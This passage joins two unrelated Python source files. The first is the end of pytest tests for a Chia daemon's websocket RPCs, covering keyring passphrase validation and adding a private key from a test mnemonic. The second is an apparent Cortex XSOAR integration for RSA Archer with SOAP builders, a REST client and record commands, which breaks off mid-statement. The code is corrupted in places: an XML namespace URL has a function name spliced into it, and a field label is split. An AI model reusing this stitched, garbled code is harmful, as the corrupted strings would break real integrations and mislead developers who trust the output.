aiohttp.WSMsgType.CLOSED: pass break read_handler = asyncio.create_task(reader(ws, message_queue)) data = {} payload = create_payload("get_blockchain_state", data, service_name, "chia_full_node") await ws.send_str(payload) await asyncio.sleep(5) blockchain_state_found = False while not message_queue.empty(): message = await message_queue.get() if message["command"] == "get_blockchain_state": blockchain_state_found = True await ws.close() read_handler.cancel() assert blockchain_state_found # Suppress warning: "The explicit passing of coroutine objects to asyncio.wait() is deprecated since Python 3.8..." # Can be removed when we upgrade to a newer version of websockets (9.1 works) @pytest.mark.filterwarnings("ignore::DeprecationWarning:websockets.*") @pytest.mark.asyncio async def test_validate_keyring_passphrase_rpc(self, get_daemon_with_temp_keyring): local_b_tools: BlockTools = get_daemon_with_temp_keyring[0] keychain = local_b_tools.local_keychain # When: the keychain has a master passphrase set keychain.set_master_passphrase( current_passphrase=DEFAULT_PASSPHRASE_IF_NO_MASTER_PASSPHRASE, new_passphrase="the correct passphrase" ) async def check_success_case(response: aiohttp.http_websocket.WSMessage): # Expect: JSON response assert response.type == aiohttp.WSMsgType.TEXT message = json.loads(response.data.strip()) # Expect: daemon handled the request assert message["ack"] is True # Expect: success flag is set to True assert message["data"]["success"] is True async def check_bad_passphrase_case(response: aiohttp.http_websocket.WSMessage): # Expect: JSON response assert response.type == aiohttp.WSMsgType.TEXT message = json.loads(response.data.strip()) # Expect: daemon handled the request assert message["ack"] is True # Expect: success flag is set to False assert message["data"]["success"] is False async def check_missing_passphrase_case(response: aiohttp.http_websocket.WSMessage): # Expect: JSON response assert response.type == aiohttp.WSMsgType.TEXT message = json.loads(response.data.strip()) # Expect: daemon handled the request assert message["ack"] is True # Expect: success flag is set to False assert message["data"]["success"] is False # Expect: error string is set assert message["data"]["error"] == "missing key" async def check_empty_passphrase_case(response: aiohttp.http_websocket.WSMessage): # Expect: JSON response assert response.type == aiohttp.WSMsgType.TEXT message = json.loads(response.data.strip()) # Expect: daemon handled the request assert message["ack"] is True # Expect: success flag is set to False assert message["data"]["success"] is False async with aiohttp.ClientSession() as session: async with session.ws_connect( f"wss://127.0.0.1:{local_b_tools._config['daemon_port']}", autoclose=True, autoping=True, heartbeat=60, ssl=local_b_tools.get_daemon_ssl_context(), max_msg_size=52428800, ) as ws: # When: using the correct passphrase await ws.send_str( create_payload("validate_keyring_passphrase", {"key": "the correct passphrase"}, "test", "daemon") ) # Expect: validation succeeds await check_success_case(await ws.receive()) # When: using the wrong passphrase await ws.send_str( create_payload("validate_keyring_passphrase", {"key": "the wrong passphrase"}, "test", "daemon") ) # Expect: validation failure await check_bad_passphrase_case(await ws.receive()) # When: not including the passphrase in the payload await ws.send_str(create_payload("validate_keyring_passphrase", {}, "test", "daemon")) # Expect: validation failure await check_missing_passphrase_case(await ws.receive()) # When: including an empty passphrase in the payload await ws.send_str(create_payload("validate_keyring_passphrase", {"key": ""}, "test", "daemon")) # Expect: validation failure await check_empty_passphrase_case(await ws.receive()) # Suppress warning: "The explicit passing of coroutine objects to asyncio.wait() is deprecated since Python 3.8..." # Can be removed when we upgrade to a newer version of websockets (9.1 works) @pytest.mark.filterwarnings("ignore::DeprecationWarning:websockets.*") @pytest.mark.asyncio async def test_add_private_key(self, get_daemon_with_temp_keyring): local_b_tools: BlockTools = get_daemon_with_temp_keyring[0] daemon: WebSocketServer = get_daemon_with_temp_keyring[1] keychain = daemon.keychain_server._default_keychain # Keys will be added here test_mnemonic = ( "grief lock ketchup video day owner torch young work " "another venue evidence spread season bright private " "tomato remind jaguar original blur embody project can" ) test_fingerprint = 2877570395 mnemonic_with_typo = f"{test_mnemonic}xyz" # intentional typo: can -> canxyz mnemonic_with_missing_word = " ".join(test_mnemonic.split(" ")[:-1]) # missing last word async def check_success_case(response: aiohttp.http_websocket.WSMessage): nonlocal keychain # Expect: JSON response assert response.type == aiohttp.WSMsgType.TEXT message = json.loads(response.data.strip()) # Expect: daemon handled the request assert message["ack"] is True # Expect: success flag is set to True assert message["data"]["success"] is True # Expect: the keychain has the new key assert keychain.get_private_key_by_fingerprint(test_fingerprint) is not None async def check_missing_param_case(response: aiohttp.http_websocket.WSMessage): # Expect: JSON response assert response.type == aiohttp.WSMsgType.TEXT message = json.loads(response.data.strip()) # Expect: daemon handled the request assert message["ack"] is True # Expect: success flag is set to False assert message["data"]["success"] is False # Expect: error field is set to "malformed request" assert message["data"]["error"] == "malformed request" # Expect: error_details message is set to "missing mnemonic and/or passphrase" assert message["data"]["error_details"]["message"] == "missing mnemonic and/or passphrase" async def check_mnemonic_with_typo_case(response: aiohttp.http_websocket.WSMessage): # Expect: JSON response assert response.type == aiohttp.WSMsgType.TEXT message = json.loads(response.data.strip()) # Expect: daemon handled the request assert message["ack"] is True # Expect: success flag is set to False assert message["data"]["success"] is False # Expect: error field is set to "'canxyz' is not in the mnemonic dictionary; may be misspelled" assert message["data"]["error"] == "'canxyz' is not in the mnemonic dictionary; may be misspelled" async def check_invalid_mnemonic_length_case(response: aiohttp.http_websocket.WSMessage): # Expect: JSON response assert response.type == aiohttp.WSMsgType.TEXT message = json.loads(response.data.strip()) # Expect: daemon handled the request assert message["ack"] is True # Expect: success flag is set to False assert message["data"]["success"] is False # Expect: error field is set to "Invalid mnemonic length" assert message["data"]["error"] == "Invalid mnemonic length" async def check_invalid_mnemonic_case(response: aiohttp.http_websocket.WSMessage): # Expect: JSON response assert response.type == aiohttp.WSMsgType.TEXT message = json.loads(response.data.strip()) # Expect: daemon handled the request assert message["ack"] is True # Expect: success flag is set to False assert message["data"]["success"] is False # Expect: error field is set to "Invalid order of mnemonic words" assert message["data"]["error"] == "Invalid order of mnemonic words" async with aiohttp.ClientSession() as session: async with session.ws_connect( f"wss://127.0.0.1:{local_b_tools._config['daemon_port']}", autoclose=True, autoping=True, heartbeat=60, ssl=local_b_tools.get_daemon_ssl_context(), max_msg_size=52428800, ) as ws: # Expect the key hasn't been added yet assert keychain.get_private_key_by_fingerprint(test_fingerprint) is None await ws.send_str( create_payload("add_private_key", {"mnemonic": test_mnemonic, "passphrase": ""}, "test", "daemon") ) # Expect: key was added successfully await check_success_case(await ws.receive()) # When: missing mnemonic await ws.send_str(create_payload("add_private_key", {"passphrase": ""}, "test", "daemon")) # Expect: Failure due to missing mnemonic await check_missing_param_case(await ws.receive()) # When: missing passphrase await ws.send_str(create_payload("add_private_key", {"mnemonic": test_mnemonic}, "test", "daemon")) # Expect: Failure due to missing passphrase await check_missing_param_case(await ws.receive()) # When: using a mmnemonic with an incorrect word (typo) await ws.send_str( create_payload( "add_private_key", {"mnemonic": mnemonic_with_typo, "passphrase": ""}, "test", "daemon" ) ) # Expect: Failure due to misspelled mnemonic await check_mnemonic_with_typo_case(await ws.receive()) # When: using a mnemonic with an incorrect word count await ws.send_str( create_payload( "add_private_key", {"mnemonic": mnemonic_with_missing_word, "passphrase": ""}, "test", "daemon" ) ) # Expect: Failure due to invalid mnemonic await check_invalid_mnemonic_length_case(await ws.receive()) # When: using an incorrect mnemnonic await ws.send_str( create_payload( "add_private_key", {"mnemonic": " ".join(["abandon"] * 24), "passphrase": ""}, "test", "daemon" ) ) # Expect: Failure due to checksum error await check_invalid_mnemonic_case(await ws.receive())
from datetime import timezone from typing import Dict, Tuple import dateparser import urllib3 from CommonServerPython import * ''' IMPORTS ''' # Disable insecure warnings urllib3.disable_warnings() OCCURRED_FORMAT = '%Y-%m-%dT%H:%M:%SZ' REQUEST_HEADERS = { 'Accept': 'application/json,text/html,application/xhtml +xml,application/xml;q=0.9,*/*;q=0.8', 'Content-Type': 'application/json' } FIELD_TYPE_DICT = { 1: 'Text', 2: 'Numeric', 3: 'Date', 4: 'Values List', 6: 'TrackingID', 7: 'External Links', 8: 'Users/Groups List', 9: 'Cross-Reference', 11: 'Attachment', 12: 'Image', 14: 'Cross-Application Status Tracking (CAST)', 16: 'Matrix', 19: 'IP Address', 20: 'Record Status', 21: 'First Published', 22: 'Last Updated Field', 23: 'Related Records', 24: 'Sub-Form', 25: 'History Log', 26: 'Discussion', 27: 'Multiple Reference Display Control', 28: 'Questionnaire Reference', 29: 'Access History', 30: 'V oting', 31: 'Scheduler', 1001: 'Cross-Application Status Tracking Field Value' } ACCOUNT_STATUS_DICT = {1: 'Active', 2: 'Inactive', 3: 'Locked'} def format_time(datetime_object: datetime, use_european_time: bool) -> str: """Transform datetime to string, handles european time. Arguments: datetime_object: object to transform use_european_time: Whatever the day position should be first or second Returns: A string formatted: 7/22/2017 3:58 PM (American) or 22/7/2017 3:58 PM (European) """ time_format = '%d/%m/%Y %I:%M %p' if use_european_time else '%m/%d/%Y %I:%M %p' return datetime_object.strftime(time_format) def parse_date_to_datetime(date: str, day_first: bool = False) -> datetime: """Return a datetime object from given date. Format of "1/1/2020 04:00 PM". Arguments: date: a date string day_first: is the day first in the string (European) Returns: a datetime object """ date_order = {'DATE_ORDER': 'DMY' if day_first else 'MDY'} date_obj = parser(date, settings=date_order) return date_obj def parser(date_str, date_formats=None, languages=None, locales=None, region=None, settings=None) -> datetime: """Wrapper of dateparser.parse to support return type value """ date_obj = dateparser.parse( date_str, date_formats=date_formats, languages=languages, locales=locales, region=region, settings=settings ) assert isinstance(date_obj, datetime), f'Could not parse date {date_str}' # MYPY Fix return date_obj def get_token_soap_request(user, password, instance): return '<?xml version="1.0" encoding="utf-8"?>' + \ '<soap:Envelope xmlns:xsi="http://www.w3.orecord_to_incidentrg/2001/XMLSchema-instance" ' \ 'xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">' + \ ' <soap:Body>' + \ ' <CreateUserSessionFromInstance xmlns="http://archer-tech.com/webservices/">' + \ f' <userName>{user}</userName>' + \ f' <instanceName>{instance}</instanceName>' + \ f' <password>{password}</password>' + \ ' </CreateUserSessionFromInstance>' + \ ' </soap:Body>' + \ '</soap:Envelope>' def terminate_session_soap_request(token): return '<?xml version="1.0" encoding="utf-8"?>' + \ '<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"' \ ' xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">' + \ ' <soap:Body>' + \ ' <TerminateSession xmlns="http://archer-tech.com/webservices/">' + \ f' <sessionToken>{token}</sessionToken>' + \ ' </TerminateSession>' + \ ' </soap:Body>' + \ '</soap:Envelope>' def get_reports_soap_request(token): return '<?xml version="1.0" encoding="utf-8"?>' + \ '<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" ' \ 'xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">' + \ ' <soap:Body>' + \ ' <GetReports xmlns="http://archer-tech.com/webservices/">' + \ f' <sessionToken>{token}</sessionToken>' + \ ' </GetReports>' + \ ' </soap:Body>' + \ '</soap:Envelope>' def get_statistic_search_report_soap_request(token, report_guid, max_results): return '<?xml version="1.0" encoding="utf-8"?>' + \ '<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"' \ ' xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">' + \ ' <soap:Body>' + \ ' <ExecuteStatisticSearchByReport xmlns="http://archer-tech.com/webservices/">' + \ f' <sessionToken>{token}</sessionToken>' + \ f' <reportIdOrGuid>{report_guid}</reportIdOrGuid>' + \ f' <pageNumber>{max_results}</pageNumber>' + \ ' </ExecuteStatisticSearchByReport>' + \ ' </soap:Body>' + \ '</soap:Envelope>' def get_search_options_soap_request(token, report_guid): return '<?xml version="1.0" encoding="utf-8"?>' + \ '<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" ' \ 'xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">' + \ ' <soap:Body>' + \ ' <GetSearchOptionsByGuid xmlns="http://archer-tech.com/webservices/">' + \ f' <sessionToken>{token}</sessionToken>' + \ f' <searchReportGuid>{report_guid}</searchReportGuid>' + \ ' </GetSearchOptionsByGuid>' + \ ' </soap:Body>' + \ '</soap:Envelope>' def search_records_by_report_soap_request(token, report_guid): return '<?xml version="1.0" encoding="utf-8"?>' + \ '<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" ' \ 'xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">' + \ ' <soap:Body>' + \ ' <SearchRecordsByReport xmlns="http://archer-tech.com/webservices/">' + \ f' <sessionToken>{token}</sessionToken>' + \ f' <reportIdOrGuid>{report_guid}</reportIdOrGuid>' + \ ' <pageNumber>1</pageNumber>' + \ ' </SearchRecordsByReport>' + \ ' </soap:Body>' + \ '</soap:Envelope>' def search_records_soap_request( token, app_id, display_fields, field_id, field_name, search_value, date_operator='', numeric_operator='', max_results=10 ): request_body = '<?xml version="1.0" encoding="UTF-8"?>' + \ '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" ' \ 'xmlns:xsd="http://www.w3.org/2001/XMLSchema"' \ ' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">' + \ ' <soap:Body>' + \ ' <ExecuteSearch xmlns="http://archer-tech.com/webservices/">' + \ f' <sessionToken>{token}</sessionToken>' + \ ' <searchOptions>' + \ ' <![CDATA[<SearchReport>' + \ ' <PageSize>100</PageSize>' + \ ' <PageNumber>1</PageNumber>' + \ f' <MaxRecordCount>{max_results}</MaxRecordCount>' + \ ' <ShowStatSummaries>false</ShowStatSummaries>' + \ f' <DisplayFields>{display_fields}</DisplayFields>' + \ f' <Criteria><ModuleCriteria><Module name="appname">{app_id}</Module></ModuleCriteria>' if search_value: request_body += '<Filter><Conditions>' if date_operator: request_body += '<DateComparisonFilterCondition>' + \ f' <Operator>{date_operator}</Operator>' + \ f' <Field name="{field_name}">{field_id}</Field>' + \ f' <Value>{search_value}</Value>' + \ ' <TimeZoneId>UTC Standard Time</TimeZoneId>' + \ ' <IsTimeIncluded>TRUE</IsTimeIncluded>' + \ '</DateComparisonFilterCondition >' elif numeric_operator: request_body += '<NumericFilterCondition>' + \ f' <Operator>{numeric_operator}</Operator>' + \ f' <Field name="{field_name}">{field_id}</Field>' + \ f' <Value>{search_value}</Value>' + \ '</NumericFilterCondition >' else: request_body += '<TextFilterCondition>' + \ ' <Operator>Contains</Operator>' + \ f' <Field name="{field_name}">{field_id}</Field>' + \ f' <Value>{search_value}</Value>' + \ '</TextFilterCondition >' request_body += '</Conditions></Filter>' if date_operator: # Fetch incidents must present date_operator request_body += '<Filter>' + \ '<Conditions>' + \ ' <DateComparisonFilterCondition>' + \ f' <Operator>{date_operator}</Operator>' + \ f' <Field name="{field_name}">{field_id}</Field>' + \ f' <Value>{search_value}</Value>' + \ ' <TimeZoneId>UTC Standard Time</TimeZoneId>' + \ ' <IsTimeIncluded>TRUE</IsTimeIncluded>' + \ ' </DateComparisonFilterCondition >' + \ '</Conditions>' + \ '</Filter>' request_body += ' </Criteria></SearchReport>]]>' + \ '</searchOptions>' + \ '<pageNumber>1</pageNumber>' + \ '</ExecuteSearch>' + \ '</soap:Body>' + \ '</soap:Envelope>' return request_body SOAP_COMMANDS = { 'archer-get-reports': {'soapAction': 'http://archer-tech.com/webservices/GetReports', 'urlSuffix': 'ws/search.asmx', 'soapBody': get_reports_soap_request, 'outputPath': 'Envelope.Body.GetReportsResponse.GetReportsResult'}, 'archer-execute-statistic-search-by-report': { 'soapAction': 'http://archer-tech.com/webservices/ExecuteStatisticSearchByReport', 'urlSuffix': 'ws/search.asmx', 'soapBody': get_statistic_search_report_soap_request, 'outputPath': 'Envelope.Body.ExecuteStatisticSearchByReportResponse.ExecuteStatistic' 'SearchByReportResult' }, 'archer-get-search-options-by-guid': {'soapAction': 'http://archer-tech.com/webservices/GetSearchOptionsByGuid', 'urlSuffix': 'ws/search.asmx', 'soapBody': get_search_options_soap_request, 'outputPath': 'Envelope.Body.GetSearchOptionsByGuidResponse.GetSearchOptionsByGuidResult' }, 'archer-search-records': {'soapAction': 'http://archer-tech.com/webservices/ExecuteSearch', 'urlSuffix': 'ws/search.asmx', 'soapBody': search_records_soap_request, 'outputPath': 'Envelope.Body.ExecuteSearchResponse.ExecuteSearchResult'}, 'archer-search-records-by-report': { 'soapAction': 'http://archer-tech.com/webservices/SearchRecordsByReport', 'urlSuffix': 'ws/search.asmx', 'soapBody': search_records_by_report_soap_request, 'outputPath': 'Envelope.Body.SearchRecordsByReportResponse.SearchRecordsByReportResult' } } class Client(BaseClient): def __init__(self, base_url, username, password, instance_name, domain, **kwargs): self.username = username self.password = password self.instance_name = instance_name self.domain = domain super(Client, self).__init__(base_url=base_url, headers=REQUEST_HEADERS, **kwargs) def do_request(self, method, url_suffix, data=None, params=None): if not REQUEST_HEADERS.get('Authorization'): self.update_session() res = self._http_request(method, url_suffix, headers=REQUEST_HEADERS, json_data=data, params=params, resp_type='response', ok_codes=(200, 401)) if res.status_code == 401: self.update_session() res = self._http_request(method, url_suffix, headers=REQUEST_HEADERS, json_data=data, resp_type='response', ok_codes=(200, 401)) return res.json() def update_session(self): body = { 'InstanceName': self.instance_name, 'Username': self.username, 'UserDomain': self.domain, 'Password': self.password } res = self._http_request('POST', '/api/core/security/login', json_data=body) is_successful_response = res.get('IsSuccessful') if not is_successful_response: return_error(res.get('ValidationMessages')) session = res.get('RequestedObject', {}).get('SessionToken') REQUEST_HEADERS['Authorization'] = f'Archer session-id={session}' def get_token(self): body = get_token_soap_request(self.username, self.password, self.instance_name) headers = {'SOAPAction': 'http://archer-tech.com/webservices/CreateUserSessionFromInstance', 'Content-Type': 'text/xml; charset=utf-8'} res = self._http_request('POST' '', 'ws/general.asmx', headers=headers, data=body, resp_type='content') return extract_from_xml(res, 'Envelope.Body.CreateUserSessionFromInstanceResponse.' 'CreateUserSessionFromInstanceResult') def destroy_token(self, token): body = terminate_session_soap_request(token) headers = {'SOAPAction': 'http://archer-tech.com/webservices/TerminateSession', 'Content-Type': 'text/xml; charset=utf-8'} self._http_request('POST', 'ws/general.asmx', headers=headers, data=body, resp_type='content') def do_soap_request(self, command, **kwargs): req_data = SOAP_COMMANDS[command] headers = {'SOAPAction': req_data['soapAction'], 'Content-Type': 'text/xml; charset=utf-8'} token = self.get_token() body = req_data['soapBody'](token, **kwargs) # type: ignore res = self._http_request('POST', req_data['urlSuffix'], headers=headers, data=body, resp_type='content') self.destroy_token(token) return extract_from_xml(res, req_data['outputPath']), res def get_level_by_app_id(self, app_id): cache = demisto.getIntegrationContext() if cache.get(app_id): return cache[app_id] levels = [] all_levels_res = self.do_request('GET', f'/api/core/system/level/module/{app_id}') for level in all_levels_res: if level.get('RequestedObject') and level.get('IsSuccessful'): level_id = level.get('RequestedObject').get('Id') fields = {} level_res = self.do_request('GET', f'/api/core/system/fielddefinition/level/{level_id}') for field in level_res: if field.get('RequestedObject') and field.get('IsSuccessful'): field_item = field.get('RequestedObject') field_id = str(field_item.get('Id')) fields[field_id] = {'Type': field_item.get('Type'), 'Name': field_item.get('Name'), 'FieldId': field_id, 'IsRequired': field_item.get('IsRequired', False), 'RelatedValuesListId': field_item.get('RelatedValuesListId')} levels.append({'level': level_id, 'mapping': fields}) if levels: cache[int(app_id)] = levels demisto.setIntegrationContext(cache) return levels return [] def get_record(self, app_id, record_id): res = self.do_request('GET', f'/api/core/content/{record_id}') if not isinstance(res, dict): res = res.json() errors = get_errors_from_res(res) record = {} if res.get('RequestedObject') and res.get('IsSuccessful'): content_obj = res.get('RequestedObject') level_id = content_obj.get('LevelId') levels = self.get_level_by_app_id(app_id) level_fields = list(filter(lambda m: m['level'] == level_id, levels)) if level_fields: level_fields = level_fields[0]['mapping'] else: return {}, res, errors for _id, field in content_obj.get('FieldContents').items(): field_data = level_fields.get(str(_id)) # type: ignore field_type = field_data.get('Type') # when field type is IP Address if field_type == 19: field_value = field.get('IpAddressBytes') # when field type is Values List elif field_type == 4 and field.get('Value') and field['Value'].get('ValuesListIds'): list_data = self.get_field_value_list(_id) list_ids = field['Value']['ValuesListIds'] list_ids = list(filter(lambda x: x['Id'] in list_ids, list_data['ValuesList'])) field_value = list(map(lambda x: x['Name'], list_ids)) else: field_value = field.get('Value') if field_value: record[field_data.get('Name')] = field_value record['Id'] = content_obj.get('Id') return record, res, errors def record_to_incident( self, record_item, app_id, date_field, day_first: bool = False, offset: int = 0 ) -> Tuple[dict, datetime]: labels = [] raw_record = record_item['raw'] record_item = record_item['record'] incident_created_time = datetime(1, 1, 1) if record_item.get(date_field): incident_created_time = parse_date_to_datetime( record_item[date_field], day_first=day_first ).replace(tzinfo=None) # fix occurred by offset incident_created_time = incident_created_time + timedelta(minutes=offset) # Will convert value to strs for k, v in record_item.items(): if isinstance(v, str): labels.append({ 'type': k, 'value': v }) else: labels.append({ 'type': k, 'value': json.dumps(v) }) labels.append({'type': 'ModuleId', 'value': app_id}) labels.append({'type': 'ContentId', 'value': record_item.get("Id")}) labels.append({'type': 'rawJSON', 'value': json.dumps(raw_record)}) incident = { 'name': f'RSA Archer Incident: {record_item.get('Id')}', 'details': json.dumps(record_item), 'occurred': incident_created_time.strftime(OCCURRED_FORMAT), 'labels': labels, 'rawJSON': json.dumps(raw_record) } demisto.debug(f'Going out with a new incident. occurred={incident['occurred']}') return incident, incident_created_time def search_records( self, app_id, fields_to_display=None, field_to_search='', search_value='', numeric_operator='', date_operator='', max_results=10, ): demisto.debug(f'searching for records {field_to_search}:{search_value}') if fields_to_display is None: fields_to_display = [] try: level_data = self.get_level_by_app_id(app_id)[0] except IndexError as exc: raise DemistoException( 'Could not find a level data. You might be using the wrong application id' ) from exc # Building request fields fields_xml = '' search_field_name = '' search_field_id = '' fields_mapping = level_data['mapping'] for field in fields_mapping.keys(): field_name = fields_mapping[field]['Name'] if field_name in fields_to_display: fields_xml += f'<DisplayField name="{field_name}">{field}</DisplayField>' if field_name == field_to_search: search_field_name = field_name search_field_id = field res, raw_res = self.do_soap_request( 'archer-search-records', app_id=app_id, display_fields=fields_xml, field_id=search_field_id, field_name=search_field_name, numeric_operator=numeric_operator, date_operator=date_operator, search_value=search_value, max_results=max_results ) if not res: return [], raw_res records = self.xml_to_records(res, fields_mapping) return records, raw_res def xml_to_records(self, xml_response, fields_mapping): res = json.loads(xml2json(xml_response)) records = [] if res.get('Records') and res['Records'].get('Record'): records_data = res['Records']['Record'] if isinstance(records_data, dict): records_data = [records_data] for item in records_data: record = {'Id': item.get('@contentId')} record_fields = item.get('Field') if isinstance(record_fields, dict): record_fields = [record_fields] for field in record_fields: field_name = fields_mapping[field.get('@id')]['Name'] field_type = field.get('@type') field_value = '' if field_type == '3': field_value = field.get('@xmlConvertedValue') elif field_type == '4': if field.get('ListValues'): field_value = field['ListValues']['ListValue']['@displayName'] elif field_type == '8': field_value = json.dumps(field) else: field_value = field.get('#text') record[field_name] = field_value records.append({'record': record, 'raw': item}) return records def get_field_value_list(self, field_id): cache = demisto.getIntegrationContext() if cache['fieldValueList'].get(field_id): return cache.get('fieldValueList').get(field_id) res = self.do_request('GET', f'/api/core/system/fielddefinition/{field_id}') errors = get_errors_from_res(res) if errors: return_error(errors) if res.get('RequestedObject') and res.get('IsSuccessful'): list_id = res['RequestedObject']['RelatedValuesListId'] values_list_res = self.do_request('GET', f'/api/core/system/valueslistvalue/valueslist/{list_id}') if values_list_res.get('RequestedObject') and values_list_res.get('IsSuccessful'): values_list = [] for value in values_list_res['RequestedObject'].get('Children'): values_list.append({'Id': value['Data']['Id'], 'Name': value['Data']['Name'], 'IsSelectable': value['Data']['IsSelectable']}) field_data = {'FieldId': field_id, 'ValuesList': values_list} cache['fieldValueList'][field_id] = field_data demisto.setIntegrationContext(cache) return field_data return {} def extract_from_xml(xml, path): xml = json.loads(xml2json(xml)) path = path.split('.') for item in path: if xml.get(item): xml = xml[item] continue return '' return xml def generate_field_contents(client, fields_values, level_fields): if fields_values and not isinstance(fields_values, dict): try: fields_values = json.loads(fields_values) except Exception: raise Exception('Failed to parese fields-values argument') field_content = {} for field_name in fields_values.keys(): field_data = None for _id, field in level_fields.items(): if field.get('Name') == field_name: field_data = field break if field_data: field_key, field_value = generate_field_value(client, field_name, field_data, fields_values[field_name]) field_content[_id] = {'Type': field_data['Type'], field_key: field_value, 'FieldId': _id} return field_content def generate_field_value(client, field_name, field_data, field_val): field_type = field_data['Type'] # when field type is Values List, call get_field_value_list method to get the value ID # for example: {"Type":["Switch"], fieldname:[value1, value2]} if field_type == 4: field_data = client.get_field_value_list(field_data['FieldId']) list_ids = [] if not isinstance(field_val, list): field_val = [field_val] for item in field_val: tmp_id = next(f for f in field_data['ValuesList'] if f['Name'] == item) if tmp_id: list_ids.append(tmp_id['Id']) else: raise Exception(f'Failed to create field {field_name} with the value {field_data}') return 'Value', {'ValuesListIds': list_ids} # when field type is External Links # for example: {"Patch URL":[{"value":"github", "link": "https://github.com"}]} elif field_type == 7: list_urls = [] for item in field_val: list_urls.append({'Name': item.get('value'), 'URL': item.get('link')}) return 'Value', list_urls # when field type is Users/Groups List # for example: {"Policy Owner":{"users":[20],"groups":[30]}} elif field_type == 8: users = field_val.get('users') groups = field_val.get('groups') field_val = {'UserList': [], 'GroupList': []} if users: for user in users: field_val['UserList'].append({'ID': user}) if groups: for group in groups: field_val['GroupList'].append({'ID': group}) return 'Value', field_val # when field type is Cross- Reference # for example: {"Area Reference(s)":[20]} elif field_type == 9: list_cross_reference = [] if isinstance(field_val, list): for content in field_val: list_cross_reference.append({'ContentID': content}) else: list_cross_reference = [{'ContentID': field_val}] return 'Value', list_cross_reference elif field_type == 19: return 'IpAddressBytes', field_val else: return 'Value', field_val def get_errors_from_res(res): if isinstance(res, dict) and res.get('ValidationMessages'): messages = [] for message in res.get('ValidationMessages'): # type: ignore messages.append(message.get('ResourcedMessage')) return '\n'.join(messages) def get_file(entry_id): get_file_path_res = demisto.getFilePath(entry_id) file_path = get_file_path_res["path"] file_name = get_file_path_res["name"] with open(file_path, 'rb') as fopen: file_bytes = fopen.read() file_bytes = base64.b64encode(file_bytes) return file_name, file_bytes.decode('utf-8') def test_module(client: Client, params: dict) -> str: if params.get('isFetch', False): offset_in_minutes = int(params['time_zone']) last_fetch = get_fetch_time( {}, params.get('fetch_time', '3 days'), offset_in_minutes ) fetch_incidents(client, params, last_fetch) return 'ok' return 'ok' if client.do_request('GET', '/api/core/system/application') else 'Connection failed.' def search_applications_command(client: Client, args: Dict[str, str]): app_id = args.get('applicationId') limit = args.get('limit') endpoint_url = '/api/core/system/application/' if app_id: endpoint_url = f'/api/core/system/application/{app_id}' res = client.do_request('GET', endpoint_url) elif limit: res = client.do_request('GET', endpoint_url, params={"$top": limit}) errors = get_errors_from_res(res) if errors: return_error(errors) if isinstance(res, dict): res = [res] applications = [] for app in res: if app.get('RequestedObject') and app.get('IsSuccessful'): app_obj = app['RequestedObject'] applications.append({'Id': app_obj.get('Id'), 'Type': app_obj.get('Type'), 'Name': app_obj.get('Name'), 'LanguageId': app_obj.get('LanguageId'), 'Status': app_obj.get('Status'), 'Guid': app_obj.get('Guid')}) markdown = tableToMarkdown('Search applications results', applications) context: dict = { 'Archer.Application(val.Id && val.Id == obj.Id)': applications} return_outputs(markdown, context, res) def get_application_fields_command(client: Client, args: Dict[str, str]): app_id = args.get('applicationId') res = client.do_request('GET', f'/api/core/system/fielddefinition/application/{app_id}') fields = [] for field in res: if field.get('RequestedObject') and field.get('IsSuccessful'): field_obj = field['RequestedObject'] field_type = field_obj.get('Type') fields.append({'FieldId': field_obj.get('Id'), 'FieldType': FIELD_TYPE_DICT.get(field_type, 'Unknown'), 'FieldName': field_obj.get('Name'), 'LevelID': field_obj.get('LevelId')}) else: errors = get_errors_from_res(field) if errors: return_error(errors) markdown = tableToMarkdown('Application fields', fields) context: dict = {'Archer.ApplicationField(val.FieldId && val.FieldId == obj.FieldId)': fields} return_outputs(markdown, context, res) def get_field_command(client: Client, args: Dict[str, str]): field_id = args.get('fieldID') res = client.do_request('GET', f'/api/core/system/fielddefinition/{field_id}') errors = get_errors_from_res(res) if errors: return_error(errors) field = {} if res.get('RequestedObject') and res.get('IsSuccessful'): field_obj = res['RequestedObject'] item_type = field_obj.get('Type') item_type = FIELD_TYPE_DICT.get(item_type, 'Unknown') field = {'FieldId': field_obj.get('Id'), 'FieldType': item_type, 'FieldName': field_obj.get('Name'), 'LevelID': field_obj.get('LevelId')} markdown = tableToMarkdown('Application field', field) context: dict = { 'Archer.ApplicationField(val.FieldId && val.FieldId == obj.FieldId)': field } return_outputs(markdown, context, res) def get_mapping_by_level_command(client: Client, args: Dict[str, str]): level = args.get('level') res = client.do_request('GET', f'/api/core/system/fielddefinition/level/{level}') items = [] for item in res: if item.get('RequestedObject') and item.get('IsSuccessful'): item_obj = item['RequestedObject'] item_type = item_obj.get('Type') if item_type: item_type = FIELD_TYPE_DICT.get(item_type, 'Unknown') else: item_type = 'Unknown' items.append({'Id': item_obj.get('Id'), 'Name': item_obj.get('Name'), 'Type': item_type, 'LevelId': item_obj.get('LevelId')}) else: errors = get_errors_from_res(item) if errors: return_error(errors) markdown = tableToMarkdown(f'Level mapping for level {level}', items) context: dict = {'Archer.LevelMapping(val.Id && val.Id == obj.Id)': items} return_outputs(markdown, context, res) def get_record_command(client: Client, args: Dict[str, str]): record_id = args.get('contentId') app_id = args.get('applicationId') record, res, errors = client.get_record(app_id, record_id) if errors: return_error(errors) markdown = tableToMarkdown('Record details', record) context: dict = { 'Archer.Record(val.Id && val.Id == obj.Id)': record } return_outputs(markdown, context, res) def create_record_command(client: Client, args: Dict[str, str]): app_id = args.get('applicationId') fields_values = args.get('fieldsToValues') try: level_data = 